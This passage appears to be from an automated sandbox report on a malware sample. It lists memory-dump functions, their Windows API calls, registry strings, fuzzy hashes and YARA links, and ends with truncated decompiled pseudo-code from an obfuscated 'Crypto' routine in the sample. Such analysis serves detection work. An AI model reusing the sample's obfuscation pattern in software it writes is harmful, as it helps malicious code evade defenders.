s, xrefs: 6E4B57A0
$, xrefs: 6E4B577C

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: $$s
API String ID: 0-4175558158
Opcode ID: 0eaae4cfcc417bc9111ab17c0265364a6a9ad4c4586aa40c05939e591d3432c2
Instruction ID: 019ce9e12013ecf7eb741341ad69060ec6ebd1410d0b3815de64f58cce742674
Opcode Fuzzy Hash: 0eaae4cfcc417bc9111ab17c0265364a6a9ad4c4586aa40c05939e591d3432c2
Instruction Fuzzy Hash: DC912630E082678BCB08DF7CD8516E9FBB1BF59300F0482ADD845D7252DB75AA69CB80

Uniqueness

Uniqueness Score: -1.00%

Function 013F43B3, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3a9287ab721a55af7d6530deb0615d2a8e54898e2ca27bcf1d9eb36a53bd873
Instruction ID: 59bf34f925e484e26fa2e92e418160e45051a4630a895c80ef63f9f53d8ec0bb
Opcode Fuzzy Hash: b3a9287ab721a55af7d6530deb0615d2a8e54898e2ca27bcf1d9eb36a53bd873
Instruction Fuzzy Hash: 20211271E0120AEBCB48DFA8D9865AEBFF0FB40314F208199D905B6250E7B45B049F81

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C67A5, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E4C67AC
std::locale::_Init.LIBCPMT ref: 6E4C67CD

Part of subcall function 6E4C5FD3: __EH_prolog3.LIBCMT ref: 6E4C5FDA
Part of subcall function 6E4C5FD3: std::_Lockit::_Lockit.LIBCPMT ref: 6E4C5FE5
Part of subcall function 6E4C5FD3: std::locale::_Setgloballocale.LIBCPMT ref: 6E4C6000
Part of subcall function 6E4C5FD3: _Yarn.LIBCPMT ref: 6E4C6016
Part of subcall function 6E4C5FD3: std::_Lockit::~_Lockit.LIBCPMT ref: 6E4C6056

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: be07478ad19c59e1515638a97853a9274232d9280e1fd3dc73f85590d4aa6c35
Instruction ID: 5e41267759b5f1b7ef3de1cd92f45a6a27ae90a987664f5728d2513f04b8cc11
Opcode Fuzzy Hash: be07478ad19c59e1515638a97853a9274232d9280e1fd3dc73f85590d4aa6c35
Instruction Fuzzy Hash: E0E0DF3AA126225BDA101FF48400FBCA5956F44F2AF154D5FD5015FE80CBE0480053C2

Uniqueness

Uniqueness Score: -1.00%

Function 014031D2, Relevance: 1.6, APIs: 1, Instructions: 77processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 014032BB

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: e4999e866b31895e85d71f96feb9971a5c793af1b3caa4b8a1cd198a0b2f789a
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 06310572801249BBCF65DF96CD09CDFBFB5FB99704F108188F91462220D3B58A64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E62EB, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DCCCD: RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,6E4DA438,00000001,00000364,00000008,000000FF,?,6E4D731A,000000FF,000000FF), ref: 6E4DCD0E

_free.LIBCMT ref: 6E4E6357

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d79b022c032317f0fc4250b06a3dbaf287368575d4d977daa84b206efbe08d59
Instruction ID: f1b4630860d1fcf7fb87b58209bd1821f59346fc9a851ec3ef79ffa59bbb346e
Opcode Fuzzy Hash: d79b022c032317f0fc4250b06a3dbaf287368575d4d977daa84b206efbe08d59
Instruction Fuzzy Hash: 3B01FE736143056BE3218FB5D841D99FBEDFB85370F250A5ED69483280E770A805C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DCCCD, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,6E4DA438,00000001,00000364,00000008,000000FF,?,6E4D731A,000000FF,000000FF), ref: 6E4DCD0E

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b8402cada379f0dc644e44296688e11792d49cbf6e30a9f4541530e3f1946c94
Instruction ID: e2adc78c31e1295f043124b911a2c55cb2f0788968aea7d412794422e188e440
Opcode Fuzzy Hash: b8402cada379f0dc644e44296688e11792d49cbf6e30a9f4541530e3f1946c94
Instruction Fuzzy Hash: FBF0B4316045265BEB511EF69C30F8A7B9CAB426A4B254417AC19BE684CF70D40946E4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E17FC, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 6E4D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

_free.LIBCMT ref: 6E4E181C

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: dee0ffea4f40e700caffb17acd15845b3d3b0f6ff6e652b8aa51f570320733c3
Instruction ID: 3490364874a4c7282474b4724c610e2d2460cd503a3d9a8a4a7b56418d8a1966
Opcode Fuzzy Hash: dee0ffea4f40e700caffb17acd15845b3d3b0f6ff6e652b8aa51f570320733c3
Instruction Fuzzy Hash: 64F06DB24057049FE3248F51D851B92B7ECFB05715F10882FE2DA87A91CBB5A848CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D9BD2, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ee52ca88b72ddefdb7846f153e9cfc7d51c3976220a35a45985501592d989751
Instruction ID: 2183f1d8fbdb88c25cfb097e1097a97c2151acdcbc7b998176c5d6f89b2a301f
Opcode Fuzzy Hash: ee52ca88b72ddefdb7846f153e9cfc7d51c3976220a35a45985501592d989751
Instruction Fuzzy Hash: F1E0E5311406225AEA511AF69D70F8A36CCAB026A0F020527EF18E6684DFE3D48986E8

Uniqueness

Uniqueness Score: -1.00%

Function 013F17CB, Relevance: 1.3, APIs: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 013F188D

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: ac27929e1fd034dd69b3ccb6a82c5e4405fd4e04ec911bf245a04a03e1fbaaf4
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: AB2113B5D0020DFBDB08DFA5C94A9EEBBB5EB44304F208199E425A7250E3B56B049FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E4BF700, Relevance: 38.9, APIs: 19, Strings: 3, Instructions: 404stringmemoryCOMMON

Download Yara Rule

APIs

CoTaskMemAlloc.OLE32(6E4BED98,49F8414E,00000000,00000000), ref: 6E4BF79A
_wcsstr.LIBVCRUNTIME ref: 6E4BF806
CharNextW.USER32(?,00000000), ref: 6E4BF819
CharNextW.USER32(00000000,?,00000000), ref: 6E4BF81E
CharNextW.USER32(00000000,?,00000000), ref: 6E4BF823
CharNextW.USER32(00000000,?,00000000), ref: 6E4BF828
CharNextW.USER32(?,?,49F8414E,00000000,00000000), ref: 6E4BF85F
CharNextW.USER32(?,?,49F8414E,00000000,00000000), ref: 6E4BF86F
CharNextW.USER32(00000000,?,49F8414E,00000000,00000000), ref: 6E4BF8CE
CoTaskMemFree.OLE32(00000000,49F8414E,00000000,00000000), ref: 6E4BF8F3
lstrcmpiW.KERNEL32(?,?,?,49F8414E,00000000,00000000), ref: 6E4BF94E
CoTaskMemFree.OLE32(00000000,?,49F8414E,00000000,00000000), ref: 6E4BF966
CharNextW.USER32(?,?,49F8414E,00000000,00000000), ref: 6E4BF9B3
CharNextW.USER32(?,49F8414E,00000000,00000000), ref: 6E4BF9C3
CoTaskMemFree.OLE32(00000000,?,49F8414E,00000000,00000000), ref: 6E4BF9E5
CoTaskMemFree.OLE32(00000000,49F8414E,00000000,00000000), ref: 6E4BFA03
lstrcmpiW.KERNEL32(?,6E4F8D3C,?,?,C000008C,00000000,00000000), ref: 6E4BFABD
CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6E4BFADC
CharNextW.USER32(?,?,00000000,00000000,00000000,?,?,C000008C,00000000,00000000), ref: 6E4BFBA1

Strings

HKCU{Software{Classes, xrefs: 6E4BF82A
HKCR, xrefs: 6E4BF800
}}, xrefs: 6E4BF8B0

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Task$Free$lstrcmpi$Alloc_wcsstr
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 2771584749-1142484189
Opcode ID: 7e3b7542898b3695c286feba03e76fc9612310bcbb288d523655c78d84182891
Instruction ID: 8a4259ed2cfa9170760cd9618330c89f741b51e60c624112ea4501043cccceab
Opcode Fuzzy Hash: 7e3b7542898b3695c286feba03e76fc9612310bcbb288d523655c78d84182891
Instruction Fuzzy Hash: ACE1A33990521A9FDB149FF8CC94F9EB7B5EF09704F20456AD909EB385EB309944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013F577E, Relevance: 27.4, Strings: 21, Instructions: 1137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E013F577E() {
				char _v24;
				signed int _v40;
				char _v68;
				signed int _v76;
				char _v100;
				signed int _v124;
				signed int _v136;
				signed int _v140;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				char _v164;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				unsigned int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				unsigned int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				unsigned int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				unsigned int _v352;
				signed int _v356;
				unsigned int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				unsigned int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				unsigned int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _t1203;
				signed int _t1228;
				void* _t1236;
				void* _t1257;
				signed int _t1274;
				void* _t1278;
				signed int _t1279;
				signed int _t1280;
				signed int _t1281;
				signed int _t1282;
				signed int _t1283;
				signed int _t1284;
				signed int _t1285;
				signed int _t1286;
				signed int _t1287;
				signed int _t1288;
				signed int _t1289;
				signed int _t1290;
				signed int _t1291;
				signed int _t1292;
				signed int _t1293;
				signed int _t1294;
				signed int _t1295;
				signed int _t1296;
				signed int _t1297;
				signed int _t1298;
				signed int _t1299;
				signed int _t1300;
				signed int _t1301;
				signed int _t1302;
				signed int _t1303;
				signed int _t1304;
				signed int _t1305;
				signed int _t1418;
				signed int _t1419;
				signed int _t1425;
				void* _t1427;
				signed int _t1431;
				signed int _t1455;
				void* _t1457;
				void* _t1460;
				void* _t1461;
				void* _t1462;

				_t1457 = (_t1455 & 0xfffffff8) - 0x290;
				_v464 = 0x824775;
				_v464 = _v464 | 0xf4ce1248;
				_t1279 = 0x16;
				_v464 = _v464 / _t1279;
				_v464 = _v464 ^ 0x0b20a7e0;
				_t1427 = 0x9128461;
				_v656 = 0xeb14ec;
				_v656 = _v656 + 0xffffa9c6;
				_t1280 = 0x30;
				_t1274 = 0x51;
				_v656 = _v656 * 0x6e;
				_v656 = _v656 + 0xffff39d4;
				_v656 = _v656 ^ 0x64dd2a50;
				_v480 = 0x9df1b2;
				_v480 = _v480 | 0xbf3fdcff;
				_v480 = _v480 ^ 0xbfbffdff;
				_v440 = 0x5b8256;
				_v440 = _v440 + 0xcf37;
				_v440 = _v440 / _t1280;
				_v440 = _v440 ^ 0x000912f3;
				_v612 = 0x456813;
				_t1281 = 0x26;
				_v612 = _v612 * 0x61;
				_v612 = _v612 << 5;
				_v612 = _v612 + 0x145c;
				_v612 = _v612 ^ 0x498cca84;
				_v388 = 0xf794ba;
				_v388 = _v388 << 0xb;
				_v388 = _v388 / _t1274;
				_v388 = _v388 ^ 0x0254abdb;
				_v356 = 0x6751c8;
				_v356 = _v356 << 7;
				_v356 = _v356 + 0xffff2f8f;
				_v356 = _v356 ^ 0x33a22b41;
				_v592 = 0xf5f6bf;
				_v592 = _v592 << 5;
				_v592 = _v592 + 0x7ad9;
				_v592 = _v592 | 0x752e76b5;
				_v592 = _v592 ^ 0x7fbe3031;
				_v528 = 0xf93da1;
				_v528 = _v528 / _t1281;
				_t1282 = 0xd;
				_v528 = _v528 / _t1282;
				_v528 = _v528 * 0x7d;
				_v528 = _v528 ^ 0x00334431;
				_v196 = 0x5ca728;
				_v196 = _v196 ^ 0x3e9890fc;
				_v196 = _v196 ^ 0x3ec71672;
				_v268 = 0x9aab1d;
				_v268 = _v268 + 0xffff4f6b;
				_v268 = _v268 ^ 0x0095c1d2;
				_v428 = 0x82cc96;
				_v428 = _v428 + 0x22b1;
				_v428 = _v428 + 0xffffa7e2;
				_v428 = _v428 ^ 0x008b49e2;
				_v604 = 0x2e3db0;
				_v604 = _v604 + 0xfe08;
				_t1283 = 0x1a;
				_v604 = _v604 / _t1283;
				_t1284 = 0x59;
				_v604 = _v604 / _t1284;
				_v604 = _v604 ^ 0x000844a4;
				_v424 = 0x5bd8c1;
				_v424 = _v424 >> 7;
				_v424 = _v424 + 0x2625;
				_v424 = _v424 ^ 0x0002acf2;
				_v296 = 0x394c59;
				_v296 = _v296 >> 8;
				_v296 = _v296 ^ 0x0007a8c8;
				_v304 = 0x853b79;
				_v304 = _v304 << 0xd;
				_v304 = _v304 ^ 0xa76b95fa;
				_v596 = 0x70ddc;
				_v596 = _v596 + 0xffff539b;
				_v596 = _v596 | 0x1f4010c2;
				_v596 = _v596 + 0x62b1;
				_v596 = _v596 ^ 0x1f40e17a;
				_v416 = 0x1fddc3;
				_t1285 = 0x3c;
				_v416 = _v416 * 0x28;
				_v416 = _v416 | 0xfd6e7dea;
				_v416 = _v416 ^ 0xfdf30a8d;
				_v384 = 0x1c9c37;
				_v384 = _v384 >> 2;
				_v384 = _v384 | 0x1a693341;
				_v384 = _v384 ^ 0x1a6d1498;
				_v276 = 0xa6072;
				_t165 =  &_v276; // 0xa6072
				_v276 =  *_t165 / _t1285;
				_v276 = _v276 ^ 0x000097da;
				_v256 = 0x116684;
				_t1286 = 0x43;
				_v256 = _v256 / _t1286;
				_v256 = _v256 ^ 0x0006d384;
				_v392 = 0x500107;
				_t1287 = 0x7b;
				_v392 = _v392 / _t1287;
				_v392 = _v392 ^ 0x6a54f113;
				_v392 = _v392 ^ 0x6a54c6f2;
				_v228 = 0x98ed12;
				_v228 = _v228 ^ 0x314dc832;
				_v228 = _v228 ^ 0x31da2c3a;
				_v512 = 0xf160ea;
				_t1288 = 0x32;
				_v512 = _v512 / _t1288;
				_v512 = _v512 << 6;
				_v512 = _v512 + 0xffff2343;
				_v512 = _v512 ^ 0x0132148d;
				_v200 = 0x18cadc;
				_v200 = _v200 + 0xffff7898;
				_v200 = _v200 ^ 0x001da22f;
				_v372 = 0x3ab003;
				_t1418 = 0x2e;
				_v372 = _v372 / _t1418;
				_t1289 = 0x52;
				_v372 = _v372 * 0x2d;
				_v372 = _v372 ^ 0x0033f7e5;
				_v220 = 0x921bdd;
				_v220 = _v220 + 0xffffb27e;
				_v220 = _v220 ^ 0x00943619;
				_v600 = 0xb6ccb4;
				_v600 = _v600 | 0x2cc9304a;
				_v600 = _v600 + 0x2f52;
				_v600 = _v600 + 0xe808;
				_v600 = _v600 ^ 0x2d0ac47b;
				_v312 = 0x65122d;
				_v312 = _v312 + 0xffff65df;
				_v312 = _v312 ^ 0x006afa6b;
				_v620 = 0x32d96d;
				_v620 = _v620 + 0x3bc8;
				_v620 = _v620 | 0xdec6debf;
				_v620 = _v620 ^ 0xdef4a963;
				_v488 = 0xe0be7f;
				_v488 = _v488 >> 0xd;
				_v488 = _v488 ^ 0xc942f524;
				_v488 = _v488 ^ 0xc94ef9a5;
				_v492 = 0x17c9b1;
				_v492 = _v492 << 1;
				_v492 = _v492 * 0x49;
				_v492 = _v492 ^ 0x0d90b4f5;
				_v516 = 0x7e72bd;
				_v516 = _v516 << 4;
				_v516 = _v516 + 0xd1ea;
				_v516 = _v516 * 0x4b;
				_v516 = _v516 ^ 0x50f43a66;
				_v524 = 0xcc9e95;
				_v524 = _v524 | 0x288ce2da;
				_v524 = _v524 / _t1289;
				_v524 = _v524 + 0xfffff98c;
				_v524 = _v524 ^ 0x007d035c;
				_v224 = 0xd176b8;
				_v224 = _v224 ^ 0x234d6d31;
				_v224 = _v224 ^ 0x239eb650;
				_v532 = 0x4b4764;
				_v532 = _v532 >> 6;
				_v532 = _v532 | 0xa9a5f0a1;
				_v532 = _v532 + 0xffffd9a4;
				_v532 = _v532 ^ 0xa9a7eda1;
				_v564 = 0xb486e9;
				_v564 = _v564 ^ 0x7d78e01a;
				_v564 = _v564 >> 4;
				_t1290 = 0x7e;
				_v564 = _v564 * 0x3a;
				_v564 = _v564 ^ 0xc80a676e;
				_v608 = 0x4da438;
				_v608 = _v608 + 0xfffff5f1;
				_v608 = _v608 / _t1290;
				_v608 = _v608 ^ 0x391b81fb;
				_v608 = _v608 ^ 0x3913dcf4;
				_v292 = 0xeca340;
				_v292 = _v292 + 0xd406;
				_v292 = _v292 ^ 0x00e60de5;
				_v244 = 0x9935f4;
				_t1291 = 0x6d;
				_v244 = _v244 / _t1291;
				_v244 = _v244 ^ 0x000602ef;
				_v568 = 0x1b59a3;
				_v568 = _v568 + 0xffffda3c;
				_v568 = _v568 / _t1291;
				_t1292 = 0x5f;
				_v568 = _v568 * 0x6f;
				_v568 = _v568 ^ 0x0012dcd4;
				_v380 = 0xe3a892;
				_v380 = _v380 << 8;
				_v380 = _v380 >> 1;
				_v380 = _v380 ^ 0x71d58de7;
				_v324 = 0x75b16d;
				_v324 = _v324 ^ 0x5772578a;
				_v324 = _v324 ^ 0x5701c761;
				_v404 = 0x3b5463;
				_v404 = _v404 >> 6;
				_v404 = _v404 | 0x4ca4b14e;
				_v404 = _v404 ^ 0x4cab3161;
				_v632 = 0xba11d3;
				_v632 = _v632 << 1;
				_v632 = _v632 / _t1418;
				_v632 = _v632 * 0x78;
				_v632 = _v632 ^ 0x03c034c4;
				_v316 = 0xe75391;
				_v316 = _v316 + 0xffff3c43;
				_v316 = _v316 ^ 0x00e250c9;
				_v460 = 0x28752;
				_v460 = _v460 << 0xe;
				_v460 = _v460 ^ 0xd47ca498;
				_v460 = _v460 ^ 0x75a92cd2;
				_v452 = 0x7cbb67;
				_v452 = _v452 >> 0xe;
				_v452 = _v452 * 0x4f;
				_v452 = _v452 ^ 0x00054169;
				_v204 = 0x38b73d;
				_v204 = _v204 | 0x990e3a0f;
				_v204 = _v204 ^ 0x993fe3e3;
				_v236 = 0x524821;
				_v236 = _v236 << 0xd;
				_v236 = _v236 ^ 0x490dd32e;
				_v308 = 0x2957ef;
				_v308 = _v308 * 0x1f;
				_v308 = _v308 ^ 0x050b138d;
				_v504 = 0x652f8f;
				_v504 = _v504 << 8;
				_v504 = _v504 / _t1274;
				_v504 = _v504 / _t1292;
				_v504 = _v504 ^ 0x0006c444;
				_v300 = 0xd78d8b;
				_v300 = _v300 << 2;
				_v300 = _v300 ^ 0x035e80b1;
				_v624 = 0x35553b;
				_v624 = _v624 ^ 0x395d48e4;
				_t443 =  &_v624; // 0x395d48e4
				_t1293 = 0x6f;
				_v624 =  *_t443 / _t1293;
				_v624 = _v624 ^ 0x31a8bfbb;
				_v624 = _v624 ^ 0x312f0a9e;
				_v364 = 0xd1d5f0;
				_t1419 = 0x2b;
				_t1294 = 0x7d;
				_v364 = _v364 * 0x63;
				_v364 = _v364 >> 4;
				_v364 = _v364 ^ 0x05189ef6;
				_v580 = 0x14eecd;
				_v580 = _v580 * 0x4e;
				_v580 = _v580 << 3;
				_v580 = _v580 * 0x6d;
				_v580 = _v580 ^ 0xb997e56a;
				_v572 = 0xcdc506;
				_v572 = _v572 ^ 0xcede99d8;
				_v572 = _v572 >> 0xd;
				_v572 = _v572 >> 1;
				_v572 = _v572 ^ 0x000630d7;
				_v280 = 0xe6046e;
				_v280 = _v280 + 0x9296;
				_v280 = _v280 ^ 0x00ec8e25;
				_v540 = 0x40ca57;
				_v540 = _v540 + 0x2267;
				_v540 = _v540 + 0xfe06;
				_v540 = _v540 + 0xf2ab;
				_v540 = _v540 ^ 0x00420313;
				_v548 = 0xc824b2;
				_v548 = _v548 + 0xffff1921;
				_v548 = _v548 | 0x10558cb3;
				_v548 = _v548 / _t1419;
				_v548 = _v548 ^ 0x006c7cd7;
				_v376 = 0x1589ed;
				_v376 = _v376 / _t1294;
				_v376 = _v376 + 0xffffad95;
				_v376 = _v376 ^ 0xfffd5564;
				_v248 = 0x731c8e;
				_v248 = _v248 << 9;
				_v248 = _v248 ^ 0xe639840a;
				_v588 = 0x68cab3;
				_v588 = _v588 << 8;
				_v588 = _v588 * 0x78;
				_v588 = _v588 ^ 0x01fc55c9;
				_v588 = _v588 ^ 0x1ef54ae2;
				_v408 = 0xb0112;
				_v408 = _v408 + 0xa834;
				_v408 = _v408 << 6;
				_v408 = _v408 ^ 0x02ee306c;
				_v436 = 0x66c5a3;
				_v436 = _v436 << 6;
				_v436 = _v436 / _t1419;
				_v436 = _v436 ^ 0x00958e12;
				_v556 = 0x32a5c5;
				_v556 = _v556 ^ 0xdb018125;
				_v556 = _v556 ^ 0x836f7016;
				_v556 = _v556 * 0x5e;
				_v556 = _v556 ^ 0x71ee7f44;
				_v232 = 0x7dcf08;
				_v232 = _v232 ^ 0x3ef79315;
				_v232 = _v232 ^ 0x3e82b50e;
				_v240 = 0xffaa48;
				_v240 = _v240 * 0x39;
				_v240 = _v240 ^ 0x38e8e9e2;
				_v368 = 0x5cab8a;
				_v368 = _v368 + 0xffffe57f;
				_v368 = _v368 >> 6;
				_v368 = _v368 ^ 0x00064138;
				_v288 = 0xe3e012;
				_t1295 = 0x7a;
				_v288 = _v288 / _t1295;
				_v288 = _v288 ^ 0x0009185c;
				_v400 = 0x81de2f;
				_v400 = _v400 | 0x36f9fc56;
				_v400 = _v400 << 0xb;
				_v400 = _v400 ^ 0xcffafc4f;
				_v476 = 0x7e648d;
				_v476 = _v476 + 0xede8;
				_v476 = _v476 << 7;
				_v476 = _v476 ^ 0x3fa4ce2f;
				_v332 = 0x97c695;
				_v332 = _v332 ^ 0x6c5baa88;
				_v332 = _v332 ^ 0x6ccfb37b;
				_v252 = 0xc87404;
				_t1296 = 0x66;
				_v252 = _v252 / _t1296;
				_v252 = _v252 ^ 0x000d39ba;
				_v340 = 0xf01581;
				_v340 = _v340 >> 4;
				_v340 = _v340 ^ 0x00095e23;
				_v216 = 0x239ee2;
				_t1297 = 0x1d;
				_v216 = _v216 / _t1297;
				_v216 = _v216 ^ 0x00078d69;
				_v472 = 0x5a6c6e;
				_v472 = _v472 | 0x4c6b3df7;
				_v472 = _v472 + 0xffff164f;
				_v472 = _v472 ^ 0x4c773344;
				_v648 = 0x261e2;
				_t1298 = 0x50;
				_v648 = _v648 * 0x16;
				_v648 = _v648 >> 9;
				_v648 = _v648 ^ 0xb7138457;
				_v648 = _v648 ^ 0xb7162f7c;
				_v576 = 0xee6ff9;
				_v576 = _v576 + 0xfffff7f6;
				_v576 = _v576 << 9;
				_v576 = _v576 << 2;
